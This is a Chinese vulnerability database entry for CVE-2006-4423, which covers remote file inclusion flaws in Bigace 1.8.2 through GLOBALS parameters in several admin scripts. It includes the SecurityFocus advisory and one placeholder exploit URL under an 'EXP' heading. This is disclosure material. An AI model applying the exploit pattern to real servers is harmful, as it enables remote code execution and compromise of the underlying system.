Bigace Globals参数多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110896 漏洞类型 输入验证
发布时间 2006-08-26 更新时间 2006-08-29
CVE编号 CVE-2006-4423 CNNVD-ID CNNVD-200608-453
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28435
https://cxsecurity.com/issue/WLB-2006080171
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-453
|漏洞详情
Bigace1.8.2中存在多个PHP远程文件包含漏洞,远程攻击者可借助以下参数中的URL执行任意PHP代码:(a)system/command/admin.cmd.php,(b)admin/include/upload_form.php和(c)admin/include/item_main.php脚本中的GLOBALS[_BIGACE][DIR][admin]参数;和(d)system/command/admin.cmd.php和(e)system/command/download.cmd.php脚本中的GLOBALS[_BIGACE][DIR][libs]参数。
|漏洞EXP
source: http://www.securityfocus.com/bid/19723/info
   
Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
   
An attacker can exploit these issues to include arbitrary remote PHP code and execute it in the context of the webserver process. 
   
A successful exploit may lead to a compromise of the underlying system; other attacks are also possible.
   
Version 1.8.2 of Bigace is known to be vulnerable; previous versions may be affected as well.

http://www.example.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]
|参考资料

来源:BID
名称:19723
链接:http://www.securityfocus.com/bid/19723
来源:BUGTRAQ
名称:20060826Bigace1.8.2(GLOBALS)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/444415/100/0/threaded
来源:XF
名称:bigace-globals-file-include(28585)
链接:http://xforce.iss.net/xforce/xfdb/28585
来源:SECTRACK
名称:1016760
链接:http://securitytracker.com/id?1016760
来源:SREASON
名称:1462
链接:http://securityreason.com/securityalert/1462